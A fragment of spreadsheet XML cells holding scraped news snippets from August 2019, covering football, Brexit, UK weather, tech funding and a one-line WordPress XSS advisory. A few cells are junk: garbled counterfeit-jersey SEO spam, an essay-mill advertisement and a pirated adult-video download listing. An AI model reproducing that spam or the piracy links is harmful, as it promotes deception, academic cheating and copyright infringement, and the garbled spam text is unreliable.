    <t>Paul Ince caught making x-rated hand gesture live on BT Sport Original Source Paul Ince was caught on camera doing an x-rated hand gesture on BT Sport – live on air. The former Wolverhampton Wanderers star was appearing on the Early Kick-Off. The incident unfolded on Saturday, August 17, and saw BT Sport forced to apologise over Ince’s gesture. The ex-Liverpool and Middlesbrough midfielder, who captained Wolves, was spotted giving a “w*****” sign shortly before the ad break. Gesturing towards Chris Sutton live on air, players Peter Crouch and Robbie Savage got the giggles over the action. But Sutton failed to see the funny side of things, looking away from Ince unimpressed. (Image: PA) BT Sport apologised to viewers once they returned from the ad break if they had seen ‘a certain rude gesture.’ The incident is not the first time BT Sport have issued an on-air apology for an offensive hand gesture, with Spurs legend David Ginola branding host Jake Humphry a “w*****” on the channel back in 2013, the Mirror Online reports. Read More Wolves features His response came after Humphrey had mocked his choice of ripped jeans and trainers attire, making the gesture behind his back as he shared a laugh with Owen Hargreaves and Steve McManaman. On that occasion, BT Sport tweeted an apology, stating: “BT Sport would like to apologise for any offence that was caused during this morning’s/Saturday’s broadcast. David Ginola apologised straight afterwards as he realised this was an inappropriate action.”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Paul Ince caught making x-rated hand gesture live on BT Sport appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The Newcastle halfback has lucrative bonuses written into his Knights deal, which were set to be triggered if his side made the finals.</t>
  </si>
  <si>
    <t>Russian Tagalog Dictionary – travel dictionary to translate Russian to Tagalog. Click on the list to show Russian or Tagalog synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Russian Tagalog Dictionary →</t>
  </si>
  <si>
    <t>Kevin Smith Announces Netflix Animated He-Man Show Original Source Photo: Kevin Winter/Getty Images Your signature everyday outfit of red boots, matching underpants, and a battle ax is about to become way more popular, if Kevin Smith has anything to say about it. According to Variety, the Jay and Silent Bob Reboot director announced on Sunday his plans for a He-Man anime series on Netflix at Power-Con in Anaheim, California. Masters of the Universe: Revelation will reportedly revisit He-Man and your other favorite Eternia residents from the popular Mattel toy franchise that inspired the original action cartoon and 1987 film. The series will apparently “focus on some of the unresolved storylines of the classic ’80s show,” though it probably won’t tackle the critical question to be addressed by the live-action He-Man movie: How in god’s name is Noah Centineo going to pull off that bob?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Kevin Smith Announces Netflix Animated He-Man Show appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>It is the first time the vehicles have been used in 12 weeks of anti-government protests. The post Hong Kong police deploy water cannon at protests appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190812/p2#a190812p2 An in-depth look at the feasibility, progress, and experts’ opinions of lidar-based vs Tesla-like camera-only approaches to fully autonomous cars (Timothy B. Lee/Ars Technica) Timothy B. Lee / Ars Technica: An in-depth look at the feasibility, progress, and experts’ opinions of lidar-based vs Tesla-like camera-only approaches to fully autonomous cars — “They’re all going to dump lidar,” Musk said about self-driving rivals in April. — Lots of companies are working to develop self-driving cars. Source: http://www.techmeme.com/190812/p2#a190812p2 The post An in-depth look at the feasibility, progress, and experts’ opinions of lidar-based vs Tesla-like camera-only approaches to fully autonomous cars (Timothy B. Lee/Ars Technica) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>At the end of July, Newcastle United agreed a transfer fee with PSG for Stanley N’Soki. It ended weeks of speculation and a number of days of negotiations for the...At the end of July, Newcastle United agreed a transfer fee with PSG for Stanley N’Soki. It ended weeks of speculation and a number of days of negotiations for the... You can click here to read the full article. The post After Newcastle United refuse to pay wages wanted, Stanley N’Soki agrees to join Nice appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>Del Zotto averaged more than 23 minutes per game in an injury-plagued fourth season, but in his fifth, he was utilized like a completely different player. Defensive backs had four interceptions in the workout, beginning on the first play of drills when cornerback Prince Amukamara picked off a deep Mike Glennon pass intended for Deonte Thompson. Commented on What Will This Team Look Like on Feb. let in two Jaromir Jagr Youth jersey goals on 27 shots in a 3 shootout win over the Canucks on Friday. Here’s how it all went down: TERRIBLE START In a physical, scrappy opening 20, it was the Bruins who took Wholesale MLB Jerseys a beating after two Detroit goals in the first period. has been removed from http://www.officialspanthersfootballauthentic.com/Nike-Danorris-Searcy-Jersey.html the Non-Football Illness list and can now return to practice, Deepi Sidhu of the ‘ official site reports. Standard one-way tickets start at $54 per adult and $27 for each Wholesale http://www.authenticwhitesoxstore.com/authentic-32-preston-tucker-jersey.html MLB Jerseys Nike NFL Jerseys 2017 child between 3 and 12, though exact Wholesale NFL Jerseys Supply prices vary Cheap NFL Jerseys China by day and time. — For more AP college basketball coverage: https: Collegebasketball and http: AP-Top25 — This was generated by Automated Insights, http: ap, using data from STATS LLC, https: Copyright 2019 by AP. Nate Karns went on the injured list with a right forearm strain. We like where we’re at because one we’re getting an opportunity to play in the Wholesale NFL Jerseys Supply Georgia Dome and two we’re getting an opportunity to get some guys healthy and that I think is very important. To figure out the cost in miles, go to Alaska Airlines website, check the Use Miles box, and put in the departure and arrival airports. Obviously, we talked about it just last week that we kind of changed the trend and even though we threw the ball for a record-setting number of yards, our quarterback http://www.officialflyersteamonline.com/Jaromir_Jagr_Jersey did, I still think that we Cheap NBA Jerseys left plays out there in the passing game. The depth tight end Cheap NFL Jerseys China has only caught one pass this season, so his absence would likely only lead to an uptick in blocking snaps for Virgil Green. Da’Norris Searcy Youth jersey Vado Morse added 14 points. That’s the challenge that lies ahead. If you can stand up and move your legs, you’re welcome, Marge Carl, 90, told espnW in 2017 of the requirements to join the Splash Sisters squad. The Ducks easily took care of Wisconsin Cheap NBA Jerseys and UC Irvine, and they have the talent to give Virginia a real scare in the Sweet 16. Bodie Hume had 15 of his 18 points after the break for the Bears , who closed the final 2 of the game with a 12 run. Then Jefferies and Joiner capped an 11 surge with back-to-back 3s, stretching it to 63 with 1 remaining. We need to put some more points on the board. Still deciding? Three months into the process, Nike Preston Tucker Youth jersey NFL Jerseys 2017 we toured the facility for an update on construction. Everybody is there. Not exactly. Completion percentage of 83 was the highest of his career among games he has started and was the fourth-highest completion percentage by a Redskins quarterback with at least 20 attempts since the 1970 AFL-NFL merger. EDT kickoff, likely filling a role as the ‘ top punt returner and No. Feeding off the confidence of first-year coach Nick Nurse, Green got redemption on the very next play. wholesale jerseys wholesale jerseys http://5kinflatablefun.eu/did-spirit-strike-competitive-a-latest-set-started-vitality-chad-williams-youth-jersey/ https://valleyresortphuquoc.com/for-knowledge-latter-abdul-planet-next-wholesale-jerseys/</t>
  </si>
  <si>
    <t>Matthew Trevithick</t>
  </si>
  <si>
    <t>The child was located by a member of the community along Lisgar Avenue, and had nearly got struck by a vehicle before being approached.</t>
  </si>
  <si>
    <t>BOSSIER CITY, La. (KTAL/KMSS) – The U.S women’s volleyball team has clinched a spot in the 2020 Summer Olympics and fans in the ArkLaTex …</t>
  </si>
  <si>
    <t>The US is in the region "to stay" says US Secretary of State Mike Pompeo - but Australia is still walking a fine line with China</t>
  </si>
  <si>
    <t>Nigel Morris</t>
  </si>
  <si>
    <t>What is the Irish backstop? It is the plan developed by Brussels and Theresa May to maintain a “soft border” on the island of Ireland. It involves the United Kingdom remaining in a customs union until a post-Brexit trade deal is struck with the European Union. In addition, Northern Ireland would remain aligned to parts of the European single market. Why did they think it was needed? All sides agree that the imposition of a “hard border” is unthinkable when the economies of Northern Ireland and the Republic are so interlinked. In addition, there are fears that it would undermine the 20-year-old Good Friday Agreement and play into the hands of violent Republican dissident groups. However, it would also become an external border of the EU, threatening the integrity of the European single market. Why? Emmanuel Macron dashed Boris Johnson’s hopes that European Union leaders would make major concessions to resolve the Brexit stand-off (Photo: AP/Daniel Cole) The government wants Britain to gain the ability to set its own tariffs on imports from outside the EU and to diverge from regulations set by Brussels. The EU says it would be impossible to have two different customs regimes operating either side of the 310-mile border without jeopardising the operation of the single market, which is fundamental to the bloc. Theresa May largely accepted this argument and following fraught and protracted negotiations consented to including the backstop plan in the withdrawal agreement. It was the key reason why the agreement was heavily defeated three times in the Commons, paving the way to Mrs May’s political downfall. What does Boris Johnson say? He has been adamant that the withdrawal agreement has to be reopened and the “anti-democratic” backstop scrapped as a precondition for his government signing a Brexit deal with Brussels. The Prime Minister maintains there are “abundant solutions” to the Irish border issue and said he is prepared to abide by Angela Merkel’s “very blistering” 30-day timetable for finding them. What alternatives could he produce? He has not yet detailed his thinking, but has pointed to a lengthy report last month by two Tory MPs who recommended a combination of administrative and technological measures for resolving the conundrum. Read More: How Emmanuel Macron plans to stop Donald Trump derailing trade talks They suggested the development of electronic customs clearance checks and the use of “trusted trader schemes” enabling businesses to avoid customs checks and cut down on paperwork. They also floated the idea of creating “enhanced economic zones” to straddle the border between Londonderry and Donegal, and possibly also Newry and Dundalk, with tax breaks and a free trade zone. For food and plant products, mobile units could be used to carry out checks away from the border. How could the EU react? Brussels has promised to work with the UK to develop alternative arrangements to the backstop. However, Brussels would have to be convinced that any other option was workable, efficient and not open to abuse. There are also doubts over how soon technological solutions could be ready. More Brexit French resistance: Boris Johnson warned Irish backstop has to stay How Macron plans to stop Donald Trump derailing the G7 summit Belfast's remain parties admit to 'grave concerns' at no-deal No-deal Brexit: NHS staff shortages and smaller fuel reserves Macron says there will be no significant changes to the Brexit deal No-deal Brexit with many side deals is likely, German editor predicts The post Irish border backstop explained: what is the Brexit deal and how will the EU react to Boris Johnson’s plans appeared first on inews.co.uk. The post Irish border backstop explained: what is the Brexit deal and how will the EU react to Boris Johnson’s plans appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>WHATSAPP is the world’s most popular chat platform, boasting 1.5 billion users around the world. However, some may be surprised to learn WhatsApp has been banned in certain countries. Express.co.uk has mapped the regions where WhatsApp is blocked. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Warning: This story contains details that readers may find disturbing. Discretion is advised.</t>
  </si>
  <si>
    <t>It took twice as long to sell in Langwarrin during the downturn, but a changing market has seen the return of quick sales.</t>
  </si>
  <si>
    <t>submitted by /u/JBeylovesyou [link] [comments] Apple launches screen replacement program for aluminum models of Apple Watch Series 2 and Series 3</t>
  </si>
  <si>
    <t>The post Cubic enables Microsoft Connected Vehicle Platform appeared first on Stories. Reference: Microsoft</t>
  </si>
  <si>
    <t>The Continental Shift exhibition gathers contemporary works from south Asia.</t>
  </si>
  <si>
    <t>A mother who died in a tragic accident has been remembered as a wonderful family woman. Angie Suryadi was killed on Friday when a large tree fell on the family car in Victoria’s Yarra Valley. Image: News Corp Australia</t>
  </si>
  <si>
    <t>HotLegsAndFeet – Aylin Diamond, Alexa Tomas – Fetish Lesbians Worship Bare Feet and Sniff Socks Model(s): Aylin Diamond, Alexa Tomas Released Date: June 17, 2015 Size: 1.90 GB Quality: MPEG-4, 1080p, 00:33:10 rapidgator:idolxx.com_061715.hlaf.aylin.alexa.1080.mp4 uploaded:idolxx.com_061715.hlaf.aylin.alexa.1080.mp4 mexashare:idolxx.com_061715.hlaf.aylin.alexa.1080.mp4 katfile:idolxx.com_061715.hlaf.aylin.alexa.1080.mp4</t>
  </si>
  <si>
    <t>Deb Matejicka</t>
  </si>
  <si>
    <t>Though the fireworks show creates the biggest (and loudest) boom at GlobalFest, it's really just one smaller part of the two-week festival.</t>
  </si>
  <si>
    <t>Kylar Loussikian</t>
  </si>
  <si>
    <t>Natural Resources Commissioner John Keniry raises complaint with Pavey following her public criticism of Barwon-Darling water use report.</t>
  </si>
  <si>
    <t>A Russian Soyuz spacecraft carrying a humanoid robot docked with the International Space Station (ISS) on Monday (August 26), TASS news agency reported, citing a live broadcast.</t>
  </si>
  <si>
    <t>David Woode</t>
  </si>
  <si>
    <t>The UK was hotter than Havana on Sunday as sun worshippers revelled in record breaking temperatures during the late summer bank holiday weekend. The Met Office said London’s Heathrow Airport reached 33C in the afternoon – surpassing the 31.5C set there in August 2001. Britain sizzled as Barcelona, Spain; the Cuban capital and Lagos in Nigeria, reached 28C, 29C and 30C respectively. Scores of sunseekers visited the nation’s parks, cooled down in lidos and rivers or simply decamped to their back gardens to make the most of the scorching weather. Dancers perform during the Children’s Day parade at London’s Notting Hill Carnival on Sunday (Photo: Victoria Jones/PA Wire) Carnival spectacle Glittering costumes, energetic dancers and the sounds of steel pans and soca livened the streets of west London at the Notting Hill Carnival. Hundreds of thousands of revellers lined the parade route to soak up the annual celebration of Caribbean culture. Up to one million partygoers are expected to attend the spectacle over the weekend – with temperatures expected to reach 33C on Monday. Forecasters said the glorious sunshine will continue during the Bank Holiday weekend – although temperatures could be a little cooler. Scorching weather Mist and fog patches are expected across parts of southern England, Wales and the Midlands but will clear by the early morning. The west of England and Wales will see some cloud but it will not spoil the good weather, forecasters said. In Scotland, rain is expected in the Hebrides and the north west from midday but much of the country will be sunny. Temperatures of 27C have been predicted. For England and Wales, most areas will be fine and dry, with the best of the sunshine hitting central and eastern areas of the country. Highs of 33C are expected in London and the south east People punt along the River Cam in Cambridge, as the heatwave continues throughout the Bank Holiday weekend. (Photo: Joe Giddens/PA Wire) Late summer sunshine Luke Miall, a Met Office meteorologist told i: “A corridor from London up to the Wash [the north-west corner of East Anglia] could see the highest temperatures on Monday. “We could see 30C in southern Yorkshire and as far west to Birmingham.” Northern Ireland can look forward to a pleasant and dry day, although it will be cooler in the west. Temperatures are expected to hover in the low 20s. The late summer sunshine – a result of warm air being dragged up over the UK from France – comes at the end of what has been a wet and chilly month. More UK news 'Severed heads' stolen from London horror exhibition Far-right activist serving on Trident nuclear submarine Prince Andrew flew on Jeffrey Epstein's 'Lolita Express' jet British Airways passengers voice anger over airline's lack of contact Trump wants a post-Brexit US-UK trade deal within a year Liquid restrictions to end at UK airports thanks to new technology The post Britons sizzle in record-breaking sunshine as the UK is hotter than Havana, Barcelona and Lagos appeared first on inews.co.uk. The post Britons sizzle in record-breaking sunshine as the UK is hotter than Havana, Barcelona and Lagos appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>According to coach Tommy Wheeldon Jr., Calgary's Cavalry FC has nothing to lose and everything to gain.</t>
  </si>
  <si>
    <t>Corey Conners was one under through 12 holes and tied for 16th when play was called for the day due to inclement weather at the Tour Championship at East Lake in Atlanta. Conners was three under for the tournament at that point, with leader Justin Thomas at 12 under. The leaderboard is here. Korn Ferry […]</t>
  </si>
  <si>
    <t>A critical incident investigation has been launched after a man who was handcuffed by police at Sydney's Prince of Wales Hospital lost consciousness and died.</t>
  </si>
  <si>
    <t>Iran’s foreign minister flew in for side talks at the G7 summit on Sunday as host France ramped up efforts to ease tensions between Tehran and Washington, a dramatic diplomatic move that the White House said had surprised U.S. President Donald Trump. CBC | World News G7 leaders fail to persuade Trump to reissue waivers on Iran oil sanctions</t>
  </si>
  <si>
    <t>jackdeighton</t>
  </si>
  <si>
    <t>SPFL Tier 3, Balmoor Stadium, 17/8/19. I saw this* but I’m still not quite sure I believe it. After a 6-0 hounding last Saturday and our failure to beat a boys’ team on Tuesday night I doubt there was a single Sons fan who travelled to this match in any hope at all, far less expectation. And it started out that way *(though I missed the first twenty minutes or so due to being held up on the way.) Peterhead were one up before I got into the ground. Our general play at this point seemed to be littered with misplaced passes and lack of control. Their second came after they were awarded a free-kick for their forward falling over. Connor Brennan saved the effort well but only at the expense of a corner which they converted to a headed goal. Cue much discussion among the Sons fans round me about whether this was the worst Dumbarton team they’d ever seen and if we’d even manage to secure any points at all in the league. Then almost out of the blue we scored. PJ Crossan waltzed down the left and his cross found Ruaridh Langan directly in front of goal and he banged it in. There was strange lack of celebration by those on the pitch though. None of the usual gathering round the scorer. It did though begin to engender confidence in the team. Half time may have helped here as we came out and started to take the game more towards the home side. We hadn’t really forced their keeper into any saves though but then Crossan took the ball up on the edge of their area and instead of skipping outside as he’d done so often before – there were three defenders lined up waiting for that – he shimmied inside to get a yard of space and belted it past the keeper. Celebrations this time; on the terracing, east stand, and pitch. Isaac Layne had been lumbering about to little effect and generally being muscled out of things but had livened up by this time starting to win balls played up to him. Apart from a flurry after the equaliser we were dominating possession by now and won a free kick on the main stand side. Layne got in front of his defender to head it in. Delirium among the fans – we were just about pinching ourselves – and plenty of celebration on the pitch. In trying to get back into the game Peterhead resorted to long balls most of which were pretty aimless. We held out reasonably comfortably. Manager Jim Duffy made late substitutions (to waste time I suppose) and among them was Ryan Tierney who impressed me again with his hold up play. He was unlucky with a late Crossan pull back which he hit first time and the keeper made a good save. So a win, three points, a journey home much happier than had seemed likely earlier and a season now looking much less daunting than it had. Fans and players indulged in much mutual applause after the final whistle blew. This might have been a one-off, football is a strange game, but the players at least should take heart from it. At least we now only need a draw from somewhere in order to equal Brechin’s low points record. One more win would surpass it. It’s the hope that kills.</t>
  </si>
  <si>
    <t>A video of the encounter emerged as the British royal faced a growing list of questions over this association with the financier who died in prison in an apparent suicide earlier this month.</t>
  </si>
  <si>
    <t>The download-monitor plugin before 1.7.1 for WordPress has XSS related to add_query_arg. Published at: August 13, 2019 at 06:15PM View on NVD website The post New vulnerability on the NVD: CVE-2015-9296 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>But he senses a 'fatigue' about the president's shenanigans</t>
  </si>
  <si>
    <t>Also on Saturday, you can catch a preview of the Women’s Volleyball Team as they host their Blue/White scrimmage on campus. Next week the Men’s … The post Villanova Fall Sports off to a great start appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Sajid Javid says he has no plans to make house sellers, rather than buyers, pay stamp duty tax. The post Chancellor: I won’t shift stamp duty to sellers appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Rafa Benitez believes our ‘Premier League experience’ and new squad members available to Steve Bruce will mean we survive this season – but hints a top 10 finish is only possible if our summer signings perform. The Spaniard seems to break our squad down into three categories – ‘Young’ players who’ve now gained Premier League know-how over the past two... Source</t>
  </si>
  <si>
    <t>Artificial intelligence firm Appen posted a result that beat expectations, but alarmed investors as the performance of its US tech company Figure Eight raised questions about the price paid.</t>
  </si>
  <si>
    <t>Yes, it was a big headline, but it's the title of the new episode of Lost Tales of Greece for Assassin's Creed Odyssey. Old Flames Burn Brighter, the next free episode of Lost Tales of Greece, was released today for Assassin's Creed Odyssey. In the episode, Kassandra receives an invitation from Anais to visit her farm in Arkadia. Kephallonia is apparently an old friend of hers. Along with the release, new items will soon be available in the Oikos store and Olympians. This is the Ikaros pack and comes with equipment, a mount and a bow. This new pack will be available on August 27th. Later this month, the 1.5.0 update will be released. With some corrections, the patch will prepare the game for the next version of the Discovery Tour: Ancient Greece. It will also add inventory / inventory purpose allowing players to start a new quest with the help of quest items. The behavior of the patrol is also coming. Finally, Ubisoft also announced new features coming in the Story Creator mode of the game. Here's a quick overview: Updating the Creator Mode Website: Save the stories for later Create and share playlists Stories of Queuing Many to look forward to then. The brighter Old Flames Burn ticket in Assassin's Creed Odyssey, Lost of Tales of Greece's last album, appeared first on VG247.</t>
  </si>
  <si>
    <t>America’s military dominance in the Indo-Pacific region is slipping, a new Australian report says, a week after defence leaders met in Perth to discuss flashpoints in the region.</t>
  </si>
  <si>
    <t>EASTENDERS favourite Linda Carter is set for a heartbreaking discovery on the BBC soap when she learns the truth about her husband’s struggles over the last few weeks. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Whatever They Told You About Assignment Cover Sheet University of Canberra Is Dead Wrong…And Here’s Why As is true with many different students, you most likely have problems with finishing all assignments within the given deadline. As is true with various students, you almost certainly have issues with finishing all assignments within the given deadline. Any kind of assignments needs plenty of research and hard work. Only then, utilizing the attention that’s reader’s, in case how to write a thesis statement australia you move on to the thesis. You notice, the conventions of English essays are much more formulaic than you may think and, in lots of ways, it is often as simple as counting to five. Moreover, composing an essay is a far superior device of learning compared to reading as an example, on account of the simple fact that in case you have the capacity to cover exactly what you have actually discovered and checked out, it indicates you’ve recognized the material perfectly. The choice to use the support of personalized authors is a appropriate remedy to your writing problems. There are invariably a vast range of opinions on the field of technology, and here are our favourite things to consider on https://www.au.payforessay.net/coursework the subject. Our experts can let you start by writing an introduction or another chapter you’re struggling with. Throughout the procedure, you’re the manager of your purchase, and you may always speak to your writer to work out some questions or in the event the first requirements have changed. Remember that while a excellent writing service ought to be affordable to you, it definitely shouldn’t be the cheapest you may find. Our writing services are the greatest solution. If you select our service, you’ll never forget a deadline again! Assurance that all your requirements will be met. Speak to us whenever you’re stuck with your assignment, and we’ll gladly help you. Our service is an excellent choice for you, because you’ll get your papers done as quickly as possible. Australian colleges and universities have strict requirements in regards to due dates for college papers, and that’s why it’s unacceptable to miss a predetermined deadline. So should you need a great paper written quickly for a fair price, turn to us and we’ll help you. Assignment Cover Sheet University http://digitalcommons.unl.edu/cgi/viewcontent.cgi?article=1001&amp;context=nchcmono of Canberra: No Longer a Mystery What every student needs is to find a website that gives quick help and inexpensive prices. By choosing us to provide you with assignment help solutions, you stand to gain in various ways. The wellness experiences of readers employing natural protocols is particularly worth reviewing. The absolute most helpful career on your fantasy job which you’ve got years in sydney. Clearly, you cannot have precisely the same interest in all subjects. You are going to be left with considerably more time, which you’ll be able to use for studying. Only native speakers Our group of writers is made up of native speakers. Our group of writing professionals is composed of graduates and teachers proficient in many different disciplines. You do not need to struggle with choosing your own writer or attempting to get in contact with a writer that doesn’t understand your requirements. Additionally, you’ve got an choice to choose between different high quality levels. Many of the potential elements of a teaching portfolio (see list below) are difficult, maybe impossible, to obtain after you’ve finished teaching a program. Where the idea for the building of a classroom building had originated beyond the community, it was shown to be much harder to find the community involved and to finish the building. Being a university student, you have to be dealing with several essays submission in 1 day. Together with the UK Essay Help undergraduates find it impossible to be worried about the time but delight in a complete life. They must know the different types of essay required in college and also how to write each one of them because there is a different strategy for each. Get our on-line essay assist and receive a terrific experience. If you don’t find out the way to start your essay or where to hunt for supporting data, we’ll be delighted to assist you. A persuasive essay is a specific sort of paper with the most important wish to persuade or convince the reader to trust in something. You could consider using essay writing help online to work out your homework troubles. Regardless of what essay writing tasks you require help with, we’ve got tools for you. When you ask us for academic writing help, we will evaluate the demands of your purchase and we’re going to discover the perfect writer to complete it. The way you would like to present the essay the exact same will be given to you. An essay is a part of work that offers the view of the authors’ own arguments. If you’re not very good at writing your essay then just devote a affordable price to receive your essay written by an internet essay writing website support. When you request assistance with essay writing, we’ll discover a writer with a degree in the subject of your paper. Our essay help writers will give you the comprehensive solution punctually. If you’re to really gain from model essays, you want to understand how to read the techniques of the writer’.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190808/p38#a190808p38 SignalWire raises $11.5M Series A led by Storm Ventures, with Samsung NEXT, Sequoia, others participating, for its open-source enterprise communication platform (FinSMEs) FinSMEs: SignalWire raises $11.5M Series A led by Storm Ventures, with Samsung NEXT, Sequoia, others participating, for its open-source enterprise communication platform — SignalWire, Inc., a Palo Alto, Calif.-based provider of an open-source enterprise communication platform, closed an $11.5m Series A funding round. Source: http://www.techmeme.com/190808/p38#a190808p38 The post SignalWire raises $11.5M Series A led by Storm Ventures, with Samsung NEXT, Sequoia, others participating, for its open-source enterprise communication platform (FinSMEs) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>BHP told Asian customers that some Pilbara iron ore shipments were lower quality than expected after suspected issues with its fleet of autonomous trucks.</t>
  </si>
  <si>
    <t>Transfer Rumours: Juventus, Real Madrid, Bayern Munich and Arsenal EAST RUTHERFORD, NJ – JULY 26: Gareth Bale of Real Madrid during the 2019 International Champions Cup match between Real Madrid and Atletico de Madrid at MetLife Stadium on July 26, 2019 in East Rutherford, New Jersey. (Photo by Matthew Ashton – AMA/Getty Images) footynews on Sport’s Football Transfer News brings you the latest transfer rumours from world football. In today’s edition, we give you the latest update on the future of Paul Pogba, with Juventus and Real Madrid still interested. Also, Bayern Munich have emerged as a potential surprise destination for Gareth Bale. And, there are difficulties in Arsenal’s pursuit of a new centre-back. Latest European Transfer Rumours Latest on Pogba – Juventus and Madrid Still Battling Out According to Alex Smith of The Mirror, Juventus are willing to offer Manchester United three players to try and land Paul Pogba. Real Madrid were reportedly previously the favourites but saw their first offer, well below United’s £150 million valuation, rejected. This could give Juventus the chance to capitalise, as Mino Raiola seeks to push for a move. Paulo Dybala, Mario Mandzukic or Blaise Matuidi could be the key to re-signing Pogba. However, Dybala and United have already disagreed over wage demands, so that remains unlikely. It seems Juventus are desperate for their star-man to return to Turin. And Pogba could be using this interested to tempt Real Madrid; Mirko Calemme of AS writes that Raiola is using second-choice Juventus to put pressure on Madrid to finalise a deal. But, Real Madrid are currently unable to meet his price-tag as they try to fund a move by selling James Rodriguez, Gareth Bale and Mariano Diaz. After spending £300 million already this summer, signing Pogba may have to wait until next year. Bayern Join Race For Bale Max Winters of Mail Online claims that Bayern Munich are considering moving for Gareth Bale as an alternative for Leroy Sané. The German champions have been chasing Sané all summer, but he remains in discussion with Manchester City over a new contract. As such, they are turning their attentions to other targets. Bale is on the fringes of Madrid’s squad and was close to a move to China earlier this summer, which the Spanish side vetoed at the eleventh hour. Bayern have wanted new recruits on the wings all summer, after losing Franck Ribery and Arjen Robben at the end of last season. They have Serge Gnabry and Kingsley Coman, but still want new faces to revitalise their attack. Leroy Sané remains their number-one priority, but Bayern remain interested in Bale as a back-up. Arsenal Face Competition For Rugani According to Alex Terrell of The Sun, Arsenal could be disappointed in their chase for a new centre-back. The Gunners were looking at Daniele Rugani of Juventus to replace Laurent Koscielny who has moved to Bordeaux. However, they face stern competition in the form of Wolverhampton Wanderers. Arsenal were thought to have offered a two-year loan deal for the Italian defender, but Wolves have trumped them with an offer of £30 million. Defence has clearly been Arsenal’s Achilles Heel for many years, something that still needs rectifying this summer. After losing Koscielny, their void at the back grows ever greater. They remain interested in Dayot Upamecano and Samuel Umtiti but could be priced out of moves. This post Transfer Rumours: Juventus, Real Madrid, Bayern Munich and Arsenal appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>It’s down to the wire folks. Today’s the last day you can save $100 on your ticket to TC Sessions: Enterprise 2019, which takes place on September 5 at the Yerba Buena Center in San Francisco. The deadline expires in mere hours — at 11:59 p.m. (PT). Get the best possible price and buy your early-bird ticket right now. We expect more than 1,000 attendees representing the enterprise software community’s best and brightest. We’re talking founders of companies in every stage and CIOs and systems architects from some of the biggest multinationals. And, of course, managing partners from the most influential venture and corporate investment firms. Take a look at just some of the companies joining us for TC Sessions: Enterprise: Bain &amp; Company, Box, Dell Technologies Capital, Google, Oracle, SAP and SoftBank. Let the networking begin! You can expect a full day of main-stage interviews and panel discussions, plus break-out sessions and speaker Q&amp;As. TechCrunch editors will dig into the big issues enterprise software companies face today along with emerging trends and technologies. Data, for example, is a mighty hot topic, and you’ll hear a lot more about it during a session entitled, Innovation Break: Data – Who Owns It?: Enterprises have historically competed by being closed entities, keeping a closed architecture and innovating internally. When applying this closed approach to the hottest new commodity, data, it simply does not work anymore. But as enterprises, startups and public institutions open themselves up, how open is too open? Hear from leaders who explore data ownership and the questions that need to be answered before the data floodgates are opened. Sponsored by SAP . If investment is on your mind, don’t miss the Investor Q&amp;A. Some of greatest investors in enterprise will be on hand to answer your burning questions. Want to know more? Check out the full agenda. Maximize your last day of early-bird buying power and take advantage of the group discount. Buy four or more tickets at once and save 20%. Here’s a bonus. Every ticket you buy to TC Sessions: Enterprise includes a free Expo Only pass to TechCrunch Disrupt SF on October 2-4. It’s now o’clock startuppers. Your opportunity to save $100 on tickets to TC Sessions: Enterprise ends tonight at precisely 11:59 p.m. (PT). Buy your early-bird tickets now and join us in September! Is your company interested in sponsoring or exhibiting at TC Sessions: Enterprise? Contact our sponsorship sales team by filling out this form. Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: Last chance for early-bird tickets to TC Sessions: Enterprise 2019</t>
  </si>
  <si>
    <t>Netflix has ordered an animated show which imagines Elvis Presley inducted into a secret government spy program under the cover of his job as a famous rock ‘n’ roll star. Agent King comes from Sony Pictures Animation, Sony Pictures TV and Authentic Brands Group. Priscilla Presley and John Eddie will serve as co-creators and executive producers, and Archer veteran Mike Arnold will write and serve as showrunner. “From the time Elvis was a young boy he always dreamed of being the superhero fighting crime and saving the world!” said Priscilla Presley. “Agent King lets him do just that. My co-creator John Eddie and I are so excited to be working with Netflix and Sony Animation on this amazing project and getting the chance to show the world an Elvis they haven’t seen before.” Longtime Presley associate Jerry Schilling will be a consultant on the series. Source: Hollywood Reporter</t>
  </si>
  <si>
    <t>Six people were injured in the strike at a major golf tournament in Atlanta on Saturday. Read more? Click here</t>
  </si>
  <si>
    <t>Former Newcastle United striker Joe Allon has labelled new Magpies manager Steve Bruce ‘Mike Cashley’s puppet’. The former Sheffield Wednesday boss was appointed as Rafael Benitez’s successor at St James’ Park last month, and the decision clearly hasn’t gone down too well with Allon. “I would’ve had more respect for him if he turned the job down,&amp;# Source</t>
  </si>
  <si>
    <t>Edinburgh Fringe review by Steve Bennett</t>
  </si>
  <si>
    <t>savage bargain</t>
  </si>
  <si>
    <t>Through the Ages: A New Story of Civilization is $56.98 at Guf ($49.99+$6.99 shipping) - lower than the Amazon low according to CCC. Other things that look like a good price are (excl. the $6.99 shipping): Heaven and Ale: $59.99 Century Eastern Wonders: $34.99 Battlestar Galactica: $49.99 Lord of Hellas: $84.99 (looks like the last one unfortunately) Edit: They also seem to have preorders for Watergate slightly cheaper than I've found elsewhere in Australia at $48.99.</t>
  </si>
  <si>
    <t>The Duke of York is one of a number of powerful men who were likely to face increased scrutiny over their friendships with Epstein as his case went to trial.</t>
  </si>
  <si>
    <t>Assistant boss Lee McCulloch wants to see Dundee United gain some momentum by recording their second Championship win inside a week at Partick Thistle tomorrow night.</t>
  </si>
  <si>
